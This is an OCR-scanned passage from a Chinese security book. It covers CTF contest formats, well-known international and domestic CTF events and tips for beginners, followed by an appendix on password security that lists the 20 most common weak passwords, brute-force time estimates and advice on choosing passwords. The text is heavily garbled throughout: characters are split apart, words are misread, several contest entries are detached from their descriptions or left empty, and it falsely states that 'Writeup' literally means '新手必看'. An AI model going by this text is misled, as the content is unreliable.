下 比赛 中 。 攻 防 模式 CTF 赛 制 可 以 实时 通过 得 分 反映 出 比赛 情况 ， 最 终 也 以 得 分 直接 分 出 
胜 负 ， 是 一 种 竞争 激烈 、 具 有 很 强 的 观赏 性 和 高 度 透明 性 的 网 络 安全 赛制 。 在 这 种 赛制 
中 ， 不 仅仅 是 比 参赛 队员 的 智力 和 技术 ， 由 于 时 间 较 长 ， 所 以 对 成 员 的 体力 要 求 也 比较 苛 
刻 ， 同 时 也 是 对 团队 之 间 的 分 工 配合 与 合作 的 考验 。 


3. 混合 模式 


混合 模式 是 结合 了 解 题 模式 和 攻防 模式 的 新 型 CTF 竞赛 模式 ， 现 已 被 越 来 越 多 的 比赛 采 
由 于 其 可 以 发 挥 团队 成 员 在 各 个 领域 的 专长 ， 这 种 新 的 竞赛 模式 被 越 来 越 多 的 人 所 接受 。 


用 


10.12 АСТЕ 


在 介绍 知名 CTF 竞 赛 之 前 ， 先 来 认识 一 个 网 站 一 一 CTFTIME (https: //ctftime. 
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org/) ， 如 图 10-1 所 示 ， 这 是 一 个 比较 全 面 提供 CTF 信 息 的 网 站 。 
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图 10-1 CTFTIME 网 站 


国际 知名 赛事 如 下 。 


DEFCON СТЕ: CTET P “世界 杯 ”。 

UCSB iCTF: 来 自 UCSB 的 面向 世界 高 校 的 CTF。 
Plaid СТЕ: 包揽 多 项 赛事 冠军 的 CMU 的 PPP 团 队 举 办 的 在 线 解 题 赛 。 
Boston Key Party: 近年 来 崛起 的 在 线 解 题 赛 。 

XXC3 СТЕ: 欧洲 历史 最 悠久 CCC 黑 客 大 会 举办 的 CTF。 
SIGINT CTF: 德国 CCCAC 协 会 另 一 场 解 题 模式 竞赛 。 
Hack.lu CTF: 卢森堡 黑客 会 议 同 期 举办 的 CTF。 
EBCTF: 由 荷兰 老牌 强 队 Eindbazen 组 织 。 


Ghost in the Shellcode: 


RwthCTF: 由 德国 OldEurOpe 组 织 的 在 线 攻防 赛 。 
RuCTF: 由 俄罗斯 Hackerdom 组 织 ， 解 题 模式 资格 赛 面 向 全 球 参赛 ， 混 合 模式 的 决 
赛 面向 俄罗斯 队伍 的 国家 级 竞赛 。 


RuCTFe: 


国内 知名 赛事 如 下 。 
> XCTF 全 国联 赛 : PENAT 
KEEN TEAM 协 办 的 全 国 性 网 络 安 全 赛事 平台 ，2014 一 2015 赛 季 五 站 选拔 赛 分 别 由 


清华 、 上 交 、 浙 大 、 杭 电 和 成 信 技 术 团 队 组 织 


由 俄罗斯 Hackerdom 组 织 的 面向 全 球 的 在 线 攻防 赛 。 
PHD CTF: 俄罗斯 Positive Hacking Day 会 


议 同 期 举办 的 CTF。 


由 Marauders 和 Men in Black Hats 共 同 组 织 的 在 线 解 题 赛 。 


间 人 安全 协会 竟 评 演练 工作 组 主办 、 南 京 赛 宁 承办 、 


(包括 杭 电 HCTF、 成 信 SCTF、 清 


华 BCTF、 上 交 OCTF 和 浙大 ACTF) ，XCTF 联 赛 总 决赛 由 蓝 莲花 战队 组 织 ， 是 国 
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内 最 权威 、 最 高 技术 水 平 与 最 大 影响 力 的 CTF 赛 事 平台 。 

> AliCTF: 由 阿里 巴巴 公司 组 织 ， 面 向 在 校 学 生 的 CTF 竟 赛 ， 冠 军 奖 金 10 万 元 加 
BlackHat 全 程 费 用 。 

> XDCTF: 由 西安 电子 科技 大 学 信息 安全 协会 组 织 的 CTF 竞 赛 ， 其 特点 是 偏向 于 渗 
透 实战 经 验 。 

> HCTF: 由 杭州 电子 科技 大 学 信息 安全 协会 承办 组 织 的 CTF。 

> ISCC: 由 北 理工 组 织 的 传统 网 络 安全 竞赛 ， 最 近 两 年 逐渐 转向 CTF 赛 制 。 


10.1.3 如何 开启 CTF 之 旅 


由 于 CTF 大 赛 中 含有 几乎 所 有 的 信息 安全 知识 〈 二 进 制程 序 的 逆向 分 析 、 二 进 制 程序 
的 漏洞 挖掘 与 利用 、 操 作 系统 内 核 安全 、 移 动 安全 〈 安 卓 逆 向 与 漏洞 分 析 、IOS 逆 向 与 漏 
洞 分 析 ) 、 网 络 协 议 分 析 、Web 攻 击 、Web 日 志 审计 与 分 析 、 隐 写 术 、 密 码 学 应 用 、 路 由 
器 漏洞 利用 、ACM 编 程 、 各 种 环境 的 取证 分 析 等 ) ， 所 以 十 分 适合 基础 扎实 的 安全 技术 
爱好 者 。 

如 果 只 是 基础 扎实 可 没 法 玩 转 CTF， 还 需要 对 各 个 方面 知识 的 深入 理解 和 应 用 。 安 全 
是 一 门 偏重 应 用 的 学 科 ， 很 多 安全 问题 并 不 是 出 在 理论 不 健全 上 ， 而 是 在 实施 的 时 候 出 
了 这 样 那样 的 问题 。 碰 到 不 懂 的 问题 ， 不 能 看 了 别人 写 的 Writeup 〈Writeup 的 字面 含义 是 
“新 手 必 看 ”， 在 CTF 竞 赛 中 ， 参 赛 选手 解 题 的 思路 及 过 程 被 称 为 Writeup， 通 常用 于 记录 
和 交流 ， 供 他 人 学 习 等 ) 就 觉得 自己 也 会 了 ， 一 定 要 自己 动手 实践 。 


10.1.4 一些 经 验 


对 于 还 没 参 加 过 线 下 CTF 竞 赛 的 笔者 来 说 ， 专 门 请 教 了 某 知名 “ 赛 棍 ” (对 资深 选手 
的 昵称 ) ， 总 结 了 一 些 经 验 分 享 给 大 家 。 

第 一 ， 解 题 型 的 比赛 一 定 不 要 在 一 道 题 目 上 卡 太 久 ， 随 时 把 思路 记录 下 来 ， 暂 时 没有 
思路 就 去 尝试 一 下 其 他 题目 ， 然 后 再 回来 继续 。 

第 二 ， 面 对 国内 的 比赛 时 ， 脑 洞 一 定 要 大 ， 因 为 国内 很 多 出 题 人 还 控制 不 好 难度 高 和 
脑 洞 大 之 间 的 区 别 ， 一 定 要 发 散 思 维 。 

第 三 ， 平 时 见 到 好 的 文章 技巧 ， 或 者 自己 踩 过 的 “ 坑 ”， 一 定 要 全 部 记 在 一 个 小 本 上 
方便 查阅 ， 不 然 很 可 能 有 的 “ 坑 ” 还 要 掉 第 二 次 。 

第 四 ， 终 端 一 定 要 美化 ， 不 然 做 题 的 效率 会 非常 低 。 

第 五 ， 很 多 Web 的 问题 ， 其 实在 想 明白 之 后 都 是 可 以 在 本 地 搭 环境 调试 或 者 fuzz〈 模 
糊 测试 ) 的 ， 千 万 不 要 不 动手 。 

第 六 ， 一 定 要 多 向 搜索 引擎 请 教 。 

读者 在 学 习 了 安全 的 基础 知识 ， 了 解 了 一 些 基 本 技巧 和 经 验 之 后 ， 就 可 以 开始 自己 的 
CIE 之 六 于。 
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密码 安全 问题 确实 是 计算 机 安全 中 十 分 重要 上 且 大 多 数 人 无 法 有 效 解决 的 严重 问题 。 
我 们 发 现 越 来 越 多 的 地 方 需要 设置 密码 ， 甚 至 有 些 地 方 同时 需要 多 个 密码 来 确保 安全 《〈 例 
如 登录 密码 和 支付 密码 ) ， 这 就 使 我 们 陷入 了 两 难 的 境地 一 一 设置 简单 好 记 的 密码 不 够 安 
全 ， 但 相对 安全 的 复杂 密码 又 实在 难以 记忆 。 

针对 这 个 问题 ， 最 好 的 解决 方法 就 是 了 解 攻击 者 的 攻击 思路 以 及 手段 ， 有 针对 性 地 设 
置 强度 高 但 又 不 至 于 难以 记忆 的 系列 密码 。 这 么 说 可 能 有 点 抽象 ， 接 下 来 ， 让 我 们 从 弱 口 
令 开 始 ， 一 点 点 地 开始 分 析 。 

这 里 先 列 出 一 些 密码 ， 请 找 找 有 没有 自己 熟悉 的 密码 ? 

123456 

123456789 

12345678 

пи 

123123 

11111111 

5201314 

000000 

123321 

00000000 

1234567890 

123123123 

1314520 

1234567 

12345 

666666 

88888888 

888888 

654321 

112233 

如 果 不 出 所 料 的 话 ， 大 部 分 人 的 某 些 账号 ， 正 是 用 着 这 些 密码 的 其 中 之 一 。 

我 们 通过 搜集 尽量 多 (虽然 相对 于 整个 密码 体系 来 说 还 不 算 多 ， 但 大 体 上 可 以 反映 概 
率 水 平 ) 、 足 够 全 面 的 密码 样本 ， 并 且 通 过 脚本 分 析 ， 计 算出 它们 出 现 的 概率 ， 总 结 出 20 
个 “最 弱 ” 的 密码 ， 评 判 标准 是 它们 出 现 的 频率 ， 如 附 图 1 所 示 。 

相信 大 部 分 人 都 能 在 其 中 找到 自己 现在 或 是 曾经 使 用 过 的 密码 ， 但 你 可 曾 想 过 它们 是 
有 多 么 不 安全 ? 下 面 不 妨 来 简单 做 一 些 计 算 。 

假设 计算 机 每 秒 可 以 尝试 一 百 次 输入 密码 并 立刻 判断 正 误 的 能 力 ， 那 么 位 于 榜首 的 
6 位 纯 数字 密码 大 约 需 要 2 小 时 45 分 钟 即 可 全 部 穷 举 〈000000 一 999999) 。 也 就 是 说 ， 最 
多 2 小 时 45 分 钟 后 ， 密 码 就 会 被 破解 ; 不 过 我 们 接着 往 下 看 ， 位 列 第 二 的 “123456789” 
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附录 密码 安全 杂谈 人 /7 


所 代表 的 9 位 纯 数 字 密码 被 穷 举 所 需 的 时 间 大 约 是 115 天 还 要 多 ， 不 过 这 是 否 可 以 说 明 它 
就 是 安全 的 了 呢 ? 大 家 当然 知道 答案 : 当然 不 是 一 一 因为 人 们 的 假设 是 随机 9 位 数字 ， 而 
123456789 属 于 规律 数字 ， 很 容易 被 人 为 破解 。 











ll outputbt - 记事 本 一 口 
ZAHA RRE 格式 (O) SEV 帮助 (H) 

123456 0. 174270290071 

123456789 0. 075297329078 

12345678 0. 044501870922 

111111 0. 0298642716312 

123123 0. 0169782148936 


11111111 0. 0156901446808 
5201314 0. 0137360198582 
000000 0. 00766271276595 
123321 0. 0066593390071 
00000000 0. 00657954609929 
1234567890 0. 00629397021277 
123123123 0. 00560862624113 
1314520 0. 00508852624113 
1234567 0. 0049864539007 


12345 0. 00495495460993 
666666 0. 00485650141844 
88888888 0. 00480289574468 
888888 0. 0038556858156 

654321 0. 00324844680851 
112233 0. 00307217943262 





附 图 1 脚本 统计 输出 结果 

因为 这 些 弱 密码 本 身 的 特性 ， 人 们 常常 会 在 密码 中 加 入 一 些 其 他 元 素 ， 例 如 字母 、 
符号 等 。 一 个 数字 和 英文 字母 (大 小 写 均 可 ) 组 合 的 6 位 密码 ， 按 照 之 前 的 条 件 需 要 18 年 
以 上 的 时 间 才 能 穷 举 完毕 ! 如 果 再 增加 一 位 ， 就 需要 上 千年 的 时 间 来 穷 举 ， 基 本 可 以 认定 
为 暂时 “无 法 穷 举 ” 的 密码 〈 随 着 计算 机 计算 性 能 的 提高 ， 所 需 时 间 无 疑 会 不 断 缩短 ， 我 
们 甚至 可 以 预料 到 ， 当 计算 机 计算 能 力 达 到 极限 时 ， 无 论 多 么 复杂 的 密码 都 无 法 摆脱 被 穷 
举 出 来 的 命运 ， 这 时 ， 人 们 就 需要 密码 之 外 的 “外 力 ” 来 干涉 密码 安全 了 。 后 文 会 详细 分 
析 ) 。 但 机 器 毕竟 不 是 恶意 攻击 的 来 源 ， 发 动 恶 意 攻击 的 是 不 怀 好 意 的 人 ， 他 们 虽 无 法 拥 
有 计算 机 的 强大 计算 能 力 ， 但 他 们 可 以 通过 分 析 来 推导 出 密码 ， 例 如 : 你 的 名 字 叫 张 三 ， 
那么 你 的 密码 极 有 可 能 含有 “ZS” 两 个 字母 ， 如 果 得 知 了 你 的 生日 ， 那 么 攻击 者 又 可 以 
尝试 很 多 种 组 合 ， 如 果 你 的 密码 恰巧 是 这 些 组 合 中 的 一 种 ， 那 么 你 的 密码 依旧 处 于 危险 
zu. 

既然 我 们 的 密码 如 此 不 安全 ， 为 什么 密码 被 破解 的 却 只 是 少数 中 的 少数 呢 ? 这 就 是 
因为 我 所 说 的 “外 力 ” 的 存在 。 回 忆 一 下 ， 某 些 时 候 在 错误 输入 某 个 密码 时 ， 第 2 次 输入 
和 第 一 次 有 什么 不 一 样 ? 没 错 ! 那 就 是 验证 码 。 现 如 今 ， 很 多 网 站 都 要 求 在 输入 密码 后 输 
入 验证 码 。 顾 名 思 义 ，“ 验 证 码 ”就 是 验证 是 否 为 机 器 的 识别 码 ， 优 秀 的 验证 码 需要 做 到 
“人 类 可 以 分 辨 但 机 器 无 法 分 辨 ”。 这 样 ， 之 前 假设 “计算 机 每 秒 进 行 一 百 次 破解 ”就 无 
法 成 立 了 。 

在 知道 密码 有 多 不 安全 之 后 ， 下 面 就 要 来 说 一 说 如 何 让 密码 变 得 安全 了 。 

人 们 总 是 会 陷入 前 文 所 提 到 的 这 样 一 个 循环 一 一 容易 记忆 的 密码 不 够 安全 ， 足 够 安全 
的 密码 却 又 很 难 记忆 。 人 们 拥有 着 成 百 上 千 的 账号 与 密码 ， 想 做 到 一 一 对 应 地 全 部 记 住 ， 
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实在 比较 困难 。 有 些 人 甚至 为 了 图 省 事 ， 将 所 有 密码 都 设置 为 同一 个 ， 结 果 一 处 密码 泄 
露 ， 导 致 此 人 整个 网 络 系统 的 庆 溃 。 

如 何 根据 网 站 的 重要 性 与 安全 性 来 设置 相应 的 密码 ， 是 密码 安全 中 十 分 重要 的 一 环 。 
需要 密码 的 账号 大 体 上 分 为 两 类 一 一 相对 安全 的 和 比较 不 安全 的 。 相 对 安全 是 指 该 网 站 用 
户 数量 极其 庞大 ， 本 身 的 安全 措施 非常 严 茄 ， 这 样 的 网 站 安全 性 较 好 ， 不 容易 泄露 ， 应 使 
用 自己 熟悉 的 密码 (但 不 是 可 以 被 穷 举 或 人 为 猜 解 的 弱 口 令 ) 。 比 较 不 安全 是 指 一 些 名 气 
较 低 ， 无 法 确定 安全 性 的 网 站 ， 这 时 如 果 使 用 含有 可 能 透露 自己 身份 信息 〈 例 如 名 字 首 字 
母 、 生 日 等 ) 的 密码 ， 一 旦 泄露 ，“ 后 遗 症 ”将 不 堪 设 想 。 此 时 设置 一 个 便于 记忆 ， 难 于 
破解 的 又 与 自己 无 关 的 密码 ， 才 是 明智 之 举 。 

除了 密码 本 身 ， 有 些 为 了 方便 用 户 的 功能 也 会 成 为 安全 隐患 ， 例 如 入 们 所 熟知 的 一 种 
功能 一 一 密码 找 回 ， 密 码 找 回 旨 在 通过 发 送 右键 /短信 等 来 验证 所 绑 定 的 身份 ， 从 而 在 不 
知道 原 密码 的 情况 下 直接 修改 密码 。 当 人 们 忘记 自己 密码 时 ， 这 确实 很 有 用 ， 假 如 这 些 身 
份 验证 信息 落 入 他 人 之 手 〈 例 如 邮箱 账号 被 盗 取 ) ， 那 么 威胁 到 的 是 你 环 环 相 扣 的 整个 密 


码 体系 。 


本 节 只 介绍 了 一 些 非常 基础 的 密码 安全 知识 ， 相 对 复杂 的 《例如 网 上 银行 ) 密码 体系 
需要 较 大 的 篇 幅 才 能 讲 清楚 。 希 望 通过 这 一 小 节 ， 帮 助 读者 朋友 们 了 解密 码 的 重要 性 ， 道 
循 密码 安全 策略 ， 提 升 防范 意识 ， 防 范 个 人 信息 与 财产 等 受到 威胁 和 攻击 。 
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